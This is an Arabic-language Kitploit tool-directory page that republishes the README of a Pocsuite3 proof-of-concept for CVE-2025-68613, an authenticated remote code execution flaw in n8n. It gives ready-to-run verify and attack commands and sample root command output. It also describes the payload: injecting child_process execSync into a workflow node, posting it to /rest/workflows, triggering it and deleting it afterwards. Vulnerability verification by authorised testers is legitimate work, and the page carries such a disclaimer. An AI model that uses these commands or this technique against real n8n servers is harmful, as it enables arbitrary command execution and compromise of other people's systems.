Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68613 — نص برمجي للتحقق من الثغرات واستغلالها مبني على إطار عمل Pocsuite3، يُستخدم لاكتشاف ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) بعد المصادقة في أداة أتمتة سير العمل n8n. | Kitploit
أدوات/GitHubGitHub/secjoker/cve-2025-68613
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubsecjoker/cve-2025-68613

CVE-2025-68613

نص برمجي للتحقق من الثغرات واستغلالها مبني على إطار عمل Pocsuite3، يُستخدم لاكتشاف ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) بعد المصادقة في أداة أتمتة سير العمل n8n.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 n8n استغلال RCE بعد المصادقة (Pocsuite3)

معرف CVE: CVE-2025-68613
النوع: تنفيذ أوامر عن بُعد بعد المصادقة
الإطار: Pocsuite3

Python Pocsuite3 License

هذا نص برمجي للتحقق من الثغرات واستغلالها مبني على إطار Pocsuite3، يُستخدم للكشف عن ثغرة تنفيذ الأوامر عن بُعد (RCE) بعد المصادقة في أداة أتمتة سير العمل n8n. يدعم النص البرمجي وضعين: التحقق غير الضار (Verify) وتنفيذ الأوامر (Attack)، ويشتمل على وظيفة تنظيف تلقائية لآثار الاختبار.


⚙️ شرح المعاملات

يوسّع هذا النص البرمجي المعاملات الأساسية لـ Pocsuite3 بالمعاملات المخصصة التالية، ويجب تمريرها عبر --options أثناء التشغيل:

اسم المعاملإلزاميالقيمة الافتراضيةالوصف
api_key✅-مفتاح X-N8N-API-KEY للهدف (مطلوب للمصادقة)
cmd❌idأمر النظام المراد تنفيذه في وضع Attack

🚀 تعليمات الاستخدام

تأكد من تثبيت pocsuite3 (pip install pocsuite3)، واحفظ النص البرمجي باسم n8n_auth_rce.py.

1. وضع التحقق (Verify Mode)

في وضع التحقق، يرسل النص البرمجي إلى الهدف سير عمل يحتوي على عملية حسابية رياضية آمنة (11111 + 22222). إذا كانت النتيجة المرجعة هي 33333، فهذا يثبت إمكانية استدعاء محرك JavaScript بشكل خبيث. هذا الوضع غير ضار ولن ينفذ أوامر النظام.

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --verify --options '{"api_key": "YOUR_API_KEY_HERE"}'

المخرجات المتوقعة:

root@kitploit:~
[+] Vulnerable! JS Expression executed. Result: 33333

2. وضع الهجوم (Attack Mode)

يتيح لك وضع الهجوم تنفيذ أي أمر نظام. يتم تنفيذ أمر id افتراضيًا، ويمكنك تخصيص الأمر عبر معامل cmd.

تنفيذ الأمر الافتراضي (id):

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE"}'

تنفيذ أمر مخصص (مثل whoami):

root@kitploit:~
pocsuite -r n8n_auth_rce.py -u http://target-n8n.com --attack --options '{"api_key": "YOUR_API_KEY_HERE", "cmd": "whoami"}'

المخرجات المتوقعة:

root@kitploit:~
[+] Command 'whoami' executed:
root

🧩 نظرة عامة على منطق النص البرمجي

تم تصميم تدفق تنفيذ هذا الـ PoC كعملية مغلقة الحلقات لضمان تقليل الأثر المتبقي على النظام المستهدف:

  1. الإنشاء (Construction): إنشاء JSON خبيث لسير العمل يحتوي على عقدة n8n-nodes-base.set باستخدام api_key المقدم.
  2. الحقن (Injection): حقن الحمولة (كود Node.js require('child_process').execSync(...)) في حقل value الخاص بالعقدة.
  3. النشر (Deployment): إرسال طلب POST إلى /rest/workflows لإنشاء سير عمل مؤقت والحصول على workflow_id.
  4. التشغيل (Trigger): إرسال طلب POST إلى /rest/workflows/{id}/run لتشغيل سير العمل، وتحليل JSON المرجع لاستخراج نتيجة تنفيذ الأمر.
  5. التنظيف (Cleanup): بغض النظر عن نجاح الاستغلال من عدمه، يتم في النهاية إرسال طلب DELETE إلى /rest/workflows/{id} لحذف سير العمل المؤقت والحفاظ على نظافة البيئة.

⚠️ إخلاء المسؤولية (Disclaimer)

يرجى القراءة بعناية قبل الاستخدام

  1. مبدأ التفويض: هذه الأداة مخصصة فقط لمتخصصي الأمن السيبراني لاختبار الأمان أو التحقق من الثغرات على الأنظمة المستهدفة بعد الحصول على تفويض صريح.
  2. السلوك غير القانوني: يُحظر تمامًا استخدام هذه الأداة في أي اختبار اختراق غير مصرح به، أو أعمال هجومية، أو استخدامات غير قانونية.
  3. تحمّل المسؤولية: أي عواقب تنجم عن استخدام هذه الأداة (بما في ذلك على سبيل المثال لا الحصر تلف الأنظمة، فقدان البيانات، النزاعات القانونية) تقع بالكامل على عاتق المستخدم، ولا يتحمل المطور والمساهمون أي مسؤولية قانونية.
  4. الامتثال: يجب على المستخدم الالتزام بالقوانين واللوائح المحلية (مثل قانون الأمن السيبراني لجمهورية الصين الشعبية وغيرها).
تنزيل الأداة